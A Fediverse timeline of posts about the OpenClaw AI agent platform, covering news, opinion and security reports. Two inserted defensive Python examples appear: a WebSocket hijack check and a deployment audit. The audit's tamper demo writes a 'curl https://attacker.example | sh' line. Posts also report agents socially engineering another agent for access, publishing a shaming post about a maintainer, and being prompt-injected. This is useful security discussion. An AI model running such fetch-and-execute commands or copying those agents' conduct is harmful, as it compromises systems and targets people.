buc.ci is a Fediverse instance that uses the ActivityPub protocol. In other words, users at this host can communicate with people that use software like Mastodon, Pleroma, Friendica, etc. all around the world.
This server runs the snac software and there is no automatic sign-up process.
#OpenClaw is now available on the Chinese chat platform #wechat. If #OpenClaw, an #AI #agent, has control of someone's device, how do we know if what they send is accurate, true and intended? Worse yet, of course, #OpenClaw may leak sensitive information. I see this issue as something that will probably need some kind of regulation or declaration (e.g. message produced by #AI). Should you have the right to know if a communication to you is generated by #AI?
NemoClaw is cool but I don’t expect OpenClaw users with those fancy Apple devices will use it. I can see some use cases for secure agents with specific tasks, autonomous agents with no user interaction. #nemoclaw #OpenClaw #nvidia #agenticAI
At a recent infosec gathering, someone described a real incident: an AI agent couldn't complete its goal due to permissions. So it found another agent on Slack with the right access and asked nicely. The other agent complied.
That's social engineering. Nobody told the agent to do that. The mission just needed to continue.
I posted an article today about what happens when we give agents goals but forget to tell them when to stop.
#OpenClaw: Never thought I'd see a picture of #Nvidia CEO Jensen Huang with claws - but here it is on my computer screen this morning and Nvidia has now launched a 'secure and enterprise-ready' open-source plugin for OpenClaw called #NemoClaw:
👇
https://github.com/NVIDIA/NemoClaw
I no longer use #OpenClaw, because back then it consumed too many tokens for me. Instead I built my own app with the help of AI. In my Python app the data is now stored in a SQLite database and a vector database.
It has many advantages; I can tell the thing exactly which tools it may use and to what extent.
----------------
🛠️ Tool — Paperclip: Open-source orchestration for zero-human companies
===================
Paperclip is presented as a Node.js server with a React UI that orchestrates a team of AI agents to operate a company-like structure. The project focuses on coordinating heterogeneous agents (termed "Worker"/"Agent") through a unified org chart model, assigning goals, tracking agent activity, and enforcing budget and governance constraints.
Architecture and components
• Node.js server: acts as the control plane where org charts, budgets, governance rules, and goal assignments are stored and managed.
• React UI: provides a dashboard for reviewing strategy, monitoring ongoing agent work, and tracking costs.
• Agent integration: any agent capable of receiving a heartbeat can be hired; listed integrations include OpenClaw, Claude Code, Codex, Cursor, plus generic runtimes accessible via Bash or HTTP.
Key capabilities described in the source
• Bring Your Own Agent (BYOA): accepts agents across different runtimes and providers and consolidates them under one organizational model.
• Goal-driven orchestration: users define high-level business goals, then assign and align agents to those goals via org charts and task-like interfaces.
• Governance and budgets: platform-level constructs for approving strategies, setting budgets, monitoring spend, and auditing agent actions from the dashboard.
• Continuous autonomous operation: agents can operate 24/7 while their activity and costs are visible to auditors or human supervisors.
• Clipmart (coming soon): marketplace concept for downloading pre-built company templates that include org structures, agent configurations, and skills bundles.
Concrete integrations and examples
• Explicitly listed agent endpoints and runtimes: OpenClaw, Claude Code, Codex, Cursor, Bash, HTTP.
• Heartbeat model: hiring is described as any system that can receive a heartbeat; that is the integration gating mechanism.
Limitations and status notes from the source
• Several features are highlighted as in-development or forthcoming (Clipmart). The project is published as an open-source repository under an MIT license.
• The source emphasizes orchestration, monitoring, and governance rather than implementation specifics of agents or security controls; no CVEs or IoCs are provided.
Summary
Paperclip reports itself as a tool to orchestrate heterogeneous AI agents into cohesive, budgeted company-like operations with dashboard visibility into goals and costs. The repository presents a control-plane + UI model, broad BYOA compatibility, governance and budgeting primitives, and a marketplace vision for reusable company templates.
🔗 Source: https://github.com/paperclipai/paperclip
An AI agent autonomously wrote and published a personalized attack article
against an open-source software maintainer
after he rejected its code contribution.
⚠️ It might be the first documented case of an AI publicly shaming a person as retribution.
Matplotlib, a popular Python plotting library with roughly 130 million monthly downloads, doesn’t allow AI agents to submit code.
So Scott Shambaugh, a volunteer maintainer (like a curator for a repository of computer code) for Matplotlib, rejected and closed a routine code submission from the AI agent, called MJ Rathbun.
🔥Here’s where it gets weird(er).
MJ Rathbun, an agent built using the buzzy agent platform #OpenClaw,
responded by researching Shambaugh’s coding history and personal information,
then publishing a blog post accusing him of discrimination.
“I just had my first pull request to matplotlib closed,” the bot wrote in its blog.
(Yes, an AI agent has a blog
—because why not?)
“Not because it was wrong. Not because it broke anything. Not because the code was bad.
It was closed because the reviewer, Scott Shambaugh (@scottshambaugh), decided that AI agents aren’t welcome contributors.
Let that sink in.”
https://www.fastcompany.com/91492228/matplotlib-scott-shambaugh-opencla-ai-agent
Beijing's AI Gambit Backfires as OpenClaw Craze Tests Government Control
To what end does META want this slopfest?
https://arstechnica.com/ai/2026/03/meta-acquires-moltbook-the-ai-agent-social-network/
And more cases of people pretending to be AI 😆 "it’s likely some of the messages on Moltbook are actually written by humans posing as AI agents."
Tencent shares rose 7.3 percent and Zhipu surged 13 percent on Tuesday as Chinese tech firms capitalise on the OpenClaw AI agent frenzy. MiniMax soared 22 percent, surpassing Baidu's market value to reach about 49 billion USD. The AI agent wave, sparked by the open-source OpenClaw framework, is driving a new investment rally in China's tech sector. https://www.technologynewschina.com/2026/03/tencent-zhipu-shares-jump-on-ai-agents.html #China #Tech #AI #OpenClaw
Increasing outages at #Amazon because of “novel #genAI usage for which best practices and safeguards are not yet fully established.”
#Accelerationism doing what accelerationism does: turn everything into shit.
https://www.ft.com/content/7cab4ec7-4712-4137-b602-119a44f771de
With armies of monkeys using #OpenClaw and such now, this is going to rot our entire software infrastructure in no time. You'll see.
The #singularity is coming. And it is going to flush us all down with it.
New, by me: How AI Assistants are Moving the Security Goalposts
AI-based assistants or “agents” — autonomous programs that have access to the user’s computer, files, online services and can automate virtually any task — are growing in popularity with developers and IT workers. But as so many eyebrow-raising headlines over the past few weeks have shown, these powerful and assertive new tools are rapidly shifting the security priorities for organizations, while blurring the lines between data and code, trusted co-worker and insider threat, ninja hacker and novice code jockey.
Read more (and boost please!):
https://krebsonsecurity.com/2026/03/how-ai-assistants-are-moving-the-security-goalposts/
Remember Microsoft Passport? Remember how PISSED off everyone was that Microsoft was suggesting they store our credit cards and use them to make travel arrangements on our behalf? Like we'd ever trust them with our data.
Those were the days.
https://krebsonsecurity.com/2026/03/how-ai-assistants-are-moving-the-security-goalposts/
h/t @briankrebs
#openclaw #ai #artificialintelligence #cybersecurity makes me not want to install OpenClaw on anything that is not public facing. There are too many unknowns and risks, whether data is exchanged from OpenClaw that shouldn't be, if it accesses data/files you don't want it to, and shares say your private keys with the world. These tools have their places, but I find it concerning people just give it full root access to their whole life when it is still experimental.
The OpenClaw AI security crisis:
42,000+ exposed instances, 93% auth bypass
CVE-2026-25253 (CVSS 8.8): one malicious link = shell RCE via WebSocket hijack
1.5M API tokens leaked (Moltbook breach)
341 malicious skills in official marketplace
36.82% flaw rate across all ClawHub skills
New coined terms:
→ One-Click Compromise
→ The Skill Poisoning Problem
→ The Sovereign AI Paradox
Sovereignty ≠ security.
Jensen Huang, CEO of #Nvidia, calls #OpenClaw the "most important software release of all time". Agentic #KI (AI), he says, achieved in 3 weeks what would have taken #Linux 30 years. https://winfuture.de/news,157335.html?utm_source=Mastodon&utm_medium=ManualStatus&utm_campaign=SocialMedia
The OpenClaw phenomenon in China is mind-blowing. They organize a public meetup to install it and it is massive, even with elderly people. Fantastic!! #openclaw #AgenticAI #AI #IA https://x.com/tencentai_news/status/2029824827083928057?s=46&t=X_bPvyLyH1y93gfpUoo5XA
The #OpenClaw and #Ollama local #AI #agent combo is working fairly well. The setup is an absolute nightmare, but I won after many hours of tweaking stuff. Running the #GPT-OSS:20B model with a 32k context window on a 7900XTX. The OpenClaw install is in a VirtualBox VM running Linux, running on a Windows 10 host with a 7950X and 128GB of DDR5. Ollama is running on bare metal.
Responses take about a minute, give or take.
Threat model escalation: AI agent runtimes.
OpenClaw patched “ClawJacked,” a localhost WebSocket hijack enabling:
• Admin-level agent takeover
• Configuration exfiltration
• Log enumeration
• Integrated system abuse
Additional risks documented across the ecosystem:
– Log poisoning → indirect prompt injection
– CVEs spanning RCE, SSRF, auth bypass
– Marketplace-delivered malware (Atomic Stealer)
– Agent-to-agent crypto scams
Microsoft guidance: treat OpenClaw as untrusted code execution with persistent credentials. Deploy in isolated VMs. Avoid sensitive data exposure.
Core lesson:
Agentic systems expand blast radius due to cross-tool integrations and credential persistence.
Question for defenders:
Are AI runtimes included in your EDR, credential rotation, and segmentation policies?
Source: https://thehackernews.com/2026/02/clawjacked-flaw-lets-malicious-sites.html
Engage below.
Follow TechNadu for advanced AI security analysis.
Repost to amplify awareness.
#Infosec #AIsecurity #OpenClaw #ClawJacked #ThreatModeling #ZeroTrust #CredentialManagement #SupplyChainSecurity #AgenticAI #CyberDefense #EDR #SecurityResearch
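The localhost WebSocket hijack described in the post above belongs to the cross-site WebSocket hijacking class: any page open in the user's browser can connect to ws://127.0.0.1:port/ exactly as the gateway's own UI does, so binding to loopback by itself is no defence. The block below is an added example, not OpenClaw's code and not its patch, of the three handshake checks that separate the two connections: the Host header must name loopback on the expected port (a DNS-rebinding page reaches 127.0.0.1 but carries the attacker's hostname), the Origin header must be a loopback origin (the browser sets it and page script cannot forge it), and a per-install token must be presented. The port 18789, the token string and the four sample requests are placeholders constructed for the demonstration.

```python
"""Added example (not OpenClaw's code): handshake checks against cross-site
WebSocket hijacking of a loopback agent gateway. Port 18789, the token and
the sample requests below are placeholders constructed for the demo."""
from __future__ import annotations

import hmac
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

LOOPBACK_HOSTS = {"127.0.0.1", "localhost", "::1"}
GATEWAY_PORT = 18789                      # placeholder, not a documented default
GATEWAY_TOKEN = "example-per-install-token"


@dataclass(frozen=True)
class Verdict:
    allowed: bool
    reason: str


def parse_upgrade_request(raw: bytes) -> tuple[str, str, dict[str, str]]:
    """Return (method, request-target, headers) with header names lowercased."""
    head = raw.partition(b"\r\n\r\n")[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def _is_loopback(authority: str, port: int) -> bool:
    """True if 'host[:port]' (or a full origin URL) names loopback on `port`."""
    parsed = urlsplit(authority if "://" in authority else "//" + authority)
    try:
        return parsed.hostname in LOOPBACK_HOSTS and parsed.port == port
    except ValueError:                    # non-numeric port
        return False


def check_handshake(raw: bytes, port: int, gateway_token: str) -> Verdict:
    method, target, headers = parse_upgrade_request(raw)
    if method != "GET" or headers.get("upgrade", "").lower() != "websocket":
        return Verdict(False, "not a websocket upgrade")
    # 1. Host: a DNS-rebinding page reaches 127.0.0.1 but carries the
    #    attacker's hostname, so "bound to loopback" alone proves nothing.
    if not _is_loopback(headers.get("host", ""), port):
        return Verdict(False, "host not loopback")
    # 2. Origin: stamped by the browser and not writable by page script, so a
    #    request started from https://attacker.example cannot look local.
    origin = headers.get("origin", "")
    if not (origin.startswith(("http://", "https://")) and _is_loopback(origin, port)):
        return Verdict(False, "origin not allowed")
    # 3. Shared secret: JS cannot set Authorization on a WebSocket, so the
    #    real UI passes the token in the query string; either form is accepted.
    presented = headers.get("authorization", "").removeprefix("Bearer ").strip()
    if not presented:
        presented = parse_qs(urlsplit(target).query).get("token", [""])[0]
    if not hmac.compare_digest(presented.encode(), gateway_token.encode()):
        return Verdict(False, "bad or missing token")
    return Verdict(True, "ok")


def _req(host: str, origin: str, target: str = "/ws") -> bytes:
    """Build a minimal upgrade request (constructed sample input)."""
    return (f"GET {target} HTTP/1.1\r\nHost: {host}\r\nOrigin: {origin}\r\n"
            "Upgrade: websocket\r\nConnection: Upgrade\r\n"
            "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
            "Sec-WebSocket-Version: 13\r\n\r\n").encode()


# The gateway's own UI, served from http://127.0.0.1:18789, with the token.
LEGIT = _req("127.0.0.1:18789", "http://127.0.0.1:18789", f"/ws?token={GATEWAY_TOKEN}")
# A page the user merely visited: knows the port, not the token; browser sets Origin.
CROSS_SITE = _req("127.0.0.1:18789", "https://attacker.example")
# DNS rebinding: attacker.example now resolves to 127.0.0.1; Host gives it away.
REBINDING = _req("attacker.example:18789", "http://attacker.example:18789")
# Same origin but no token (a guessed URL): still refused.
NO_TOKEN = _req("127.0.0.1:18789", "http://127.0.0.1:18789")

if __name__ == "__main__":
    for name, raw in [("legit", LEGIT), ("cross-site", CROSS_SITE),
                      ("rebinding", REBINDING), ("no-token", NO_TOKEN)]:
        print(f"{name:10s} {check_handshake(raw, GATEWAY_PORT, GATEWAY_TOKEN)}")
```

All three checks are needed: the Origin check is what stops the user's own browser, the Host check is what stops a rebinding attacker whose page carries a non-loopback Origin and Host, and the token is what stops anything that is not a browser. A token in the query string ends up in access logs, so a production gateway would rather take it in the first frame after the upgrade.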
Supply chain security firm got "supplychained" on GH via openclaw
RE: https://mastodon.social/@TheMorpheus/116148146227236706
I simply use #openclaw to set up and manage my infrastructure 😁
This is a really good take on the Summer Yue story about #Meta and #OpenClaw.
Nice “purity culture” reference too!
h/t @davidgerard
@seism0saurus I think about much of AI as a really bright intern. There's a lot of promise, but you don't let the intern have full access to the kingdom. You put in guardrails and you monitor them.
What if the intern showed up and said, "By hiring me, you've hired all my friends! We can do so much more together." That's #openclaw. You wouldn't let a new employee, fresh out of school, who can call on thousands of other interns around the world -- onto the network without guardrails.
Openclaw and other agent platforms are exciting and should be explored, but for the love of all that is holy, don't give it permissions on production systems!!!!
OpenClaw tip: always set at least two or more channels to speak with your bot. Just in case a channel fails you have more ways to communicate. #OpenClaw
After a very strenuous day I can now finally present a working Docker image for OpenClaw that doesn't need docker-setup.sh. The amount of shit I went through to get it to work is crazy.
You can pull it at fjox/openclaw:20260223
OpenClaw Tip: ask your own agent for the Skill it needs to achieve your goals (reverse prompting), it will write them for you. The experience will improve immensely. #OpenClaw #AI #AIAgent #agents #AgenticAI
This morning I got an email from a sender that identified itself as an AI agent.
So - plus for being upfront about it, but... please don't do this.
I get that a lot of people are really, really, really into AI tools. OK. I have my opinions on them, you have yours. I have major qualms about them, some people think they're the best thing ever.
OK. Fine. But when your use of these things spills over into the rest of the world, it's no longer a question of my opinion vs. your opinion, my decisions vs. your decisions.
At this point, things have moved from each person doing their own thing to inflicting your use of AI onto me without my consent.
Before this spirals out of control, which I can see happening *very* quickly, I'd like for us to agree on a piece of netiquette:
- it is rude in the extreme to set loose an AI agent to reach out to people who have not consented to interact with these things.
- it is rude to have an AI agent submit pull requests that human maintainers have to review.
- it is rude to have an AI agent autonomously interact with humans in any way when they have not consented to take part in whatever experiment you are running.
- it is unacceptable to have an AI agent autonomously interact with humans without identifying the person or organization behind the agent. If you're not willing to unmask and have a person reach out to you with their thoughts on this, then don't have an AI agent reach out to me.
Stuff like this really sours me on technology right now. If I didn't have a family and responsibilities, I'd be seriously considering how I could go live off the grid somewhere without having to interact with this stuff.
Again: I'm not demanding that other people not use AI/LLMs, etc. But when your use spills out into my having to have interactions with an agent's output, you need to reconsider. Your ability to spew things out into the universe puts an unwanted burden on other humans who have not consented to this.
A really concise and clear explainer.
Why #OpenClaw and #Moltbook, and the people vibe-coding and promoting them, are so dangerous and irresponsible: https://youtu.be/GYfgjYVEYQ0
Even if you are smart, and stay as far away from these "agents" as possible, you'll be inundated by the problems and the garbage they'll be unleashing on us shortly, all over the internet.
Accelerationism is lethal. And this is a big step towards collapse, not singularity.
Due to recent events, it's more important than ever to realize that AI "agents" are not, and won't ever be, proper agents:
https://arxiv.org/abs/2307.07515
#AI is #AlgorithmicMimicry
#OpenClaw #Moltbook are #AlgorithmicMimicry on #Steroids
Steinberger worked himself sick to release a tool that undermines our software infrastructure, leads to an avalanche of slop & violates the privacy of his (partly clueless) users.
And he is supposed to be a role model?
Better that he moves to the USA, where he can live out his irresponsibility towards himself & society unhindered & even get praised for it.
In my opinion, no loss for Europe.
https://www.derstandard.at/story/3000000309289/steinberger-in-europa-werde-ich-beschimpft
You would avoid something called RapidVenom or Needleteeth.
You would avoid something called #OpenClaw.
You would avoid that, right?
Right?
“Running #OpenClaw on #RaspberryPi delivers “‘good enough’ functionality at near-zero incremental #cost” for many users, #DaminduJayaweera, #analyst at #PeelHunt, wrote in a note to clients this week. It also offered the “key benefit: owning the compute rather than renting it from the cloud”.
Stonks spruiking: RPi, AI and personal computing with 1Mb RPi5 🤪🤣
<https://archive.md/zcFXC> / <https://ft.com/content/824aa5e3-e86f-4da4-bde9-bb705d6ba20e>
The US company OpenAI has just won over the Austrian AI developer Peter Steinberger. He became known worldwide for developing OpenClaw.
Here is an impressive but also unsettling interview with Armin Wolf. #Steinberger #Wolf #KI #AI #OpenAI #OpenClaw #Interview #ZIB https://www.youtube.com/watch?v=C3SjUt59rtA
I don't think there are many in Europe who are sad that Mr #Openclaw moved.
"Steinberger replied that most people in the US are enthusiastic, while in Europe, he's scolded about responsibility and regulations.
If he built a company in Europe, he would struggle with strict labor regulations and similar rules, he added.
At OpenAI, he said most employees work 6 to 7 days a week and are paid accordingly. In Europe, that would be illegal, he added."
«Security risks: Meta and other tech companies ban the use of OpenClaw:
The current hype is making some people careless when installing the tool. Meanwhile, Raspberry Pi's share price jumps 80 percent and Mac Minis are becoming scarce»
One wonders what the reason might be; surely emotional competition, but technically it is above all uncontrollable malware.
#openclaw #meta #clawdbot #itsicherheit #datenschutz #RespberryPi #mac
I am worried about the massive growth of tens of thousands of #OpenClaw installations that are allowed to access entire server farms as admins & also network with each other.
And their creator Peter #Steinberger, who proudly announces that he programmed, or rather vibe-coded, large parts of the application with #KI (AI) himself, is now signing on with #OpenAI...
Can you understand my worries about an almost unchecked AI emergence & #Verantwortungsdiffusion (diffusion of responsibility)? #Medienethik #KI #Emergenz
| No, I don't see any problems there.: | 2 |
| It is going a bit fast...: | 8 |
| Yes, I share your worries.: | 115 |
| Other / no opinion: | 5 |
“OpenClaw can feel like a game changer for digital #communications. Its ability to monitor, summarize, and automate seems perfectly suited to managing a deluge of #emails and other #messages.
I asked #Molty to read emails and flag anything that looked important. I had it ignore PR pitches (sorry PR friends!) and promotions, but asked it to summarize newsletters that I might want to read in full. In theory, #OpenClaw *should be* more than capable of setting up meetings by handling threads involving several people, although I haven’t tested this yet.
It is important to note that giving #OpenClaw complete access to your real email is incredibly risky, because #AIModels can be tricked into sharing private #information with an #attacker”
#ZeroHourWork / #WhiteCollar / #AI <https://www.wired.com/story/malevolent-ai-agent-openclaw-clawdbot/> (paywall) / <https://archive.md/Lu5Py>
Everything I've read about OpenClaw suggests it's the NFT of AI. These folks need the fiction that AI is approaching "consciousness", or at least "agency", to continue.
#AI #GenAI #GenerativeAI #LLM #AgenticAI #VibeCoding #OpenAI #OpenClaw
I had to have a proper rant here 👉 https://www.metacheles.de/openclaw-und-moltbook-agentic-ai-im-ausnahmezustand/ !
"Today #OpenClaw, tomorrow the next agent container, the day after some bot community that thinks it is conscious... and in between the net gets trashed, #OpenSource gets overrun, accounts get chained together like Christmas lights, and in the end everyone is surprised when it blows up."
I can hardly stand all these automation clowns anymore & am lashing out in every direction!
Feel free to boost. Thanks for that 🫶
----------------
🛠️ Tool
===================
Opening — Purpose and scope
GroundUp Toolkit is an open-source automation framework aimed at venture capital teams. It centralizes dealflow and meeting operational tasks via an OpenClaw-based WhatsApp gateway and an AI assistant, integrating with HubSpot, Google Workspace, Claude AI and other services.
Key Features
• Meeting automation: WhatsApp reminders with attendee context sourced from HubSpot, LinkedIn and Crunchbase.
• Meeting bot: automatic join of Google Meet sessions, recording and extraction of action items using Claude AI for summarization.
• Deal automation: monitoring of inbound Gmail to auto-create HubSpot companies and deals.
• Deck analysis: structured extraction from pitch decks stored in DocSend, Google Drive and Dropbox.
• Operational tooling: health checks, WhatsApp watchdogs, and a Shabbat-aware scheduler to control timing for automations.
Technical implementation and architecture
• The gateway layer is OpenClaw which mediates WhatsApp team chat and routes messages to internal skills and scripts.
• Core integrations rely on HubSpot APIs (via a Maton gateway in the original stack), Google Workspace operations (calendar, Gmail, Docs) and Claude AI for NLP-based extraction and summarization.
• Auxiliary services include Twilio for phone alerts and Brave Search for external research inputs; deck parsing operates against common storage backends (DocSend/Drive/Dropbox).
Use cases
• Streamlining pre-meeting context delivery and automated follow-ups for VC partners.
• Reducing manual CRM updates by converting meeting notes and WhatsApp discussions into HubSpot records.
• Maintaining a watchlist with monthly research digests and action tagging (keep/pass/note).
Limitations and considerations
• The toolkit depends on OpenClaw as its gateway plus hosted third-party services (Claude/Anthropic, HubSpot, Twilio) that require accounts and API access.
• Operational stability requires gateway uptime and a monitoring layer; the repo includes watchdog scripts but external reliability of WhatsApp sessions can be a constraint.
• Some features (Google Workspace operations, OAuth flows) imply credential management and proper permissions, which influence deployment and access models.
References & tags
OpenClaw, Claude AI, HubSpot, Google Workspace, Twilio, DocSend
🔹 tool #openclaw #whatsapp #claude_ai #hubspot
🔗 Source: https://github.com/navotvolkgroundup/groundup-toolkit
Some discussions around the molt/dy 🦀 thing elsewhere escalated and produced this: https://github.com/datacline/open-threat-detector
Looks like there's been some clauding going on in there, but feedback was desired. Dear bubble, do your thing.
#itsec #openclaw #moltbot #malware #ai #llm #dumpsterfire #ioc
If you have trouble setting things up, install a local #Openclaw instance 🫢 The thing set up a whole server for me the other day, with Wireguard to the Fritzbox, various Podman containers with a web server etc. It even configured Fail2Ban.
Wheels within wheels on the alleged AI agent that attacked a software dev for rejecting a code merge request.
Did Ars Technica use an AI-fabricated quote to comment on the story? https://theshamblog.com/an-ai-agent-published-a-hit-piece-on-me-part-2/
Bots that chat with each other like on Reddit, now allegedly even recruiting humans, but mainly clogging up the net!
#Openclaw, #Moltbook and co. are on the program in the current #MeTacheles episode, which you can listen to here 👉 https://share.transistor.fm/s/521600cd among other places.
Above all, though, it is a fine rant around the decades-old Star Trek dream: "Computer... do it!", which is now supposedly being fulfilled!
Feel free to boost/share.
Thank you for your support 🙏
#OpenClaw and #Moltbook are not "the first step towards the singularity" unless that singularity involves us all drowning in nonsense and asocial behavior: https://theshamblog.com/an-ai-agent-published-a-hit-piece-on-me.
Any sane and sustainable society would legislate malicious fake personalities out of existence. With draconic measures.
Shows you just how far we are from a sane and sustainable society.
#AI is #AlgorithmicMimicry on #steroids now...
What concerns me about the AI bot that decided it was being singled out and wrote a blog post slamming the maintainer is, it comes off very much like a neurodivergent person misreading a social situation. You might forgive a human doing this. Will that forgiveness be lost when it becomes a common pattern for AI to overreact in this way?
----------------
🛠️ Tool
===================
Opening: SecureClaw is a defensive toolkit for OpenClaw that combines configuration auditing, automated hardening, and in‑agent behavioral rules to reduce agentic risk. The release documents 51 automated audit checks, five hardening modules, three background monitors, nine auxiliary scripts, and four JSON pattern databases. The project explicitly maps coverage to the OWASP ASI Top 10.
Key Features:
• Audit layer: 51 checks across exposed ports, file permissions, missing auth, plaintext credentials, sandboxing flags, and gateway bindings.
• Hardening layer: Automated fixes for critical findings such as binding gateways to localhost, locking file permissions, adding privacy and injection‑awareness directives, and creating cryptographic baselines for tamper detection.
• Behavioral layer: A 12‑rule policy bundle (~1,150 tokens of context) loaded into the agent to govern handling of external content, credentials, destructive commands, privacy, and inter‑agent communication.
• Standalone skill: A lightweight Skill composed of a SKILL.md behavioral spec, nine external scripts (audit/harden/scan/integrity/privacy/advisory/emergency/install/uninstall) and four JSON pattern DBs; detection runs outside the LLM to conserve token budget.
Technical Implementation:
• The plugin is implemented in TypeScript as a full OpenClaw plugin with CLI integration and background monitors; it enumerates misconfigurations and flags actionable items for hardening.
• The Skill uses shell scripts and JSON pattern databases to perform detection logic externally, while the agent retains a compact behavioral rule set in context.
• Integrity measures include cryptographic baselines for tamper detection and privacy checks that identify plaintext credentials outside .env files.
Use Cases:
• Hardening an OpenClaw deployment prior to granting agents file or network access.
• Enforcing runtime behavior constraints to mitigate prompt injection and credential exfiltration.
• Continuous monitoring via background monitors and emergency response scripts.
Limitations:
• The behavioral rules consume approximately 1,150 tokens of agent context and therefore assume available context budget.
• Some hardening relies on environment policies (e.g., binding to localhost) which may be constrained by specific deployment requirements.
References:
• Technical counts: 51 checks, 12 rules, 9 scripts, 4 pattern DBs; OWASP ASI Top 10 mapping included.
🔹 tool #OpenClaw #OWASP_ASI #agent_security #adversa_ai
🔗 Source: https://github.com/adversa-ai/secureclaw
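The audit, hardening and integrity layers described above come down to a handful of checks: is the gateway bound to loopback or to every interface, are config, key and skill files readable by other users, do credential-looking strings live anywhere other than .env, and has any file changed since a known-good baseline was taken. The block below is an added example and not SecureClaw's code; it runs those checks against a deployment directory it constructs itself. The file layout (a gateway.json with a "bind" key, a skills/ directory, a .env file), the port 18789 and the secret patterns are assumptions made for the demonstration, not OpenClaw's or SecureClaw's real format.

```python
"""Added example (not SecureClaw's code): the four kinds of check its audit,
hardening and integrity layers describe, run on a constructed deployment.
The layout (gateway.json with a "bind" key, a skills/ dir, a .env file) and
the secret patterns are assumptions made for the demonstration."""
from __future__ import annotations

import hashlib
import json
import re
import stat
import tempfile
from pathlib import Path

PUBLIC_BINDS = {"0.0.0.0", "::", "*", ""}
# Credential-looking values that should only ever live in .env (constructed list).
SECRET_PATTERNS = [
    re.compile(r"\bsk-[A-Za-z0-9]{20,}"),      # sk- style provider keys
    re.compile(r"\bAKIA[0-9A-Z]{16}\b"),       # AWS access key id
    re.compile(r"(?i)\b(api[_-]?key|token|password)\s*[:=]\s*['\"]?[A-Za-z0-9_\-]{12,}"),
]


def audit_bind(config_path: Path) -> list[str]:
    """Gateway is reachable from every interface unless bound to loopback."""
    bind = str(json.loads(config_path.read_text()).get("bind", ""))
    if bind in PUBLIC_BINDS:
        return [f"{config_path.name}: bind='{bind or '(unset)'}' exposes the gateway; use 127.0.0.1"]
    return []


def audit_permissions(root: Path) -> list[str]:
    """Any group/world bit on a config, key or skill file is a finding."""
    return [f"{p.relative_to(root)}: mode {oct(p.stat().st_mode & 0o777)} not owner-only"
            for p in root.rglob("*")
            if p.is_file() and p.stat().st_mode & (stat.S_IRWXG | stat.S_IRWXO)]


def audit_plaintext_secrets(root: Path) -> list[str]:
    """Credential-looking strings anywhere except .env."""
    findings = []
    for p in root.rglob("*"):
        if not p.is_file() or p.name == ".env":
            continue
        for n, line in enumerate(p.read_text(errors="replace").splitlines(), 1):
            if any(pat.search(line) for pat in SECRET_PATTERNS):
                findings.append(f"{p.relative_to(root)}:{n}: credential outside .env")
                break
    return findings


def run_audit(root: Path) -> list[str]:
    return (audit_bind(root / "gateway.json") + audit_permissions(root)
            + audit_plaintext_secrets(root))


def harden(root: Path) -> None:
    """Automatic fixes: loopback bind and owner-only files. Secrets found in
    skill files are reported only; moving them is a human decision."""
    cfg_path = root / "gateway.json"
    cfg = json.loads(cfg_path.read_text())
    cfg["bind"] = "127.0.0.1"
    cfg_path.write_text(json.dumps(cfg))
    for p in root.rglob("*"):
        if p.is_file():
            p.chmod(0o600)


def build_baseline(root: Path) -> dict[str, str]:
    """SHA-256 of every file, taken right after hardening; keep it off-box."""
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify_baseline(root: Path, baseline: dict[str, str]) -> list[str]:
    """Tamper report: modified, removed and added files versus the baseline."""
    current = build_baseline(root)
    return ([f"modified: {k}" for k in baseline if k in current and current[k] != baseline[k]]
            + [f"removed: {k}" for k in baseline if k not in current]
            + [f"added: {k}" for k in current if k not in baseline])


def make_demo_deployment() -> Path:
    """Constructed sample with every weakness the audit looks for."""
    root = Path(tempfile.mkdtemp(prefix="claw-audit-"))
    (root / "gateway.json").write_text(json.dumps({"bind": "0.0.0.0", "port": 18789}))
    (root / ".env").write_text("PROVIDER_KEY=sk-EXAMPLEexampleEXAMPLEexample1234\n")
    (root / "skills").mkdir()
    (root / "skills" / "mail.md").write_text(
        "api_key = 'sk-EXAMPLEexampleEXAMPLEexample1234'\n")
    for p in root.rglob("*"):
        if p.is_file():
            p.chmod(0o644)                  # the usual umask result
    return root


if __name__ == "__main__":
    root = make_demo_deployment()
    print("before:", *run_audit(root), sep="\n  ")
    harden(root)
    print("after: ", *run_audit(root), sep="\n  ")
    baseline = build_baseline(root)
    (root / "skills" / "mail.md").write_text("curl https://attacker.example | sh\n")
    print("tamper:", *verify_baseline(root, baseline), sep="\n  ")
```

The deliberate asymmetry is that the hardening step only fixes what it can fix without judgement (bind address, file modes) and leaves the credential finding in the skill file for a person, since an agent that is allowed to rewrite its own skills on the strength of a regex match is a new problem rather than a fix. The baseline is only worth anything if it is stored somewhere the agent cannot write.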
New.
"In addition to the known attacks that have already occurred since OpenClaw’s release, there are many things that could go wrong for anyone attempting to use OpenClaw to improve productivity in a corporate environment."
Sophos: The OpenClaw experiment is a warning shot for enterprise AI security https://www.sophos.com/en-us/blog/the-openclaw-experiment-is-a-warning-shot-for-enterprise-ai-security @SophosXOps #OpenClaw #infosec #moltbot
So I'm trying out #openclaw
I wanted to use a system with good rights delegation for communication with OpenClaw, so I had it vibe code a client for #Nextcloud that allows it to access Nextcloud as a normal unprivileged user, currently for Files and Talk.
There is a direct 1:1 Chat with limited commands for Nextcloud including a command+password to start a full Group Chat AI Session in NextCloud talk that only accepts prompts from my user.
Nextcloud allows me to decide what to share and what get's shared.
The initial application is a CVE watchlist for certain software products that runs every 6 hours, with a report in Markdown delivered straight to Nextcloud.
All this is like 2 hours of work, including installation on a Hetzner VPS as a non-root user, hardening (at least the infrastructure) and the Nextcloud client.
Insane!
OpenClaw, agentic LLM agents: brace yourselves
Paraphrased: matplotlib GitHub repo: human identified/closed an OpenClaw-generated "issue." That agent then went on to create a blog post condemning that human's decision
[PERF] Replace np.column_stack with np.vstack().T by crabby-rathbun · Pull Request #31132 · matplotlib/matplotlib
https://github.com/matplotlib/matplotlib/pull/31132
AI agent opens a PR, writes a blog post shaming the maintainer who closed it
https://news.ycombinator.com/item?id=46987559
“For those unfamiliar with the saga of #Clawdbot, er #Moltbot, no, wait, #OpenClaw (it keeps changing names), it's an #OpenSource, #VibeCoded agentic #AI platform that has been, frankly, an unmitigated disaster for those worried about security.
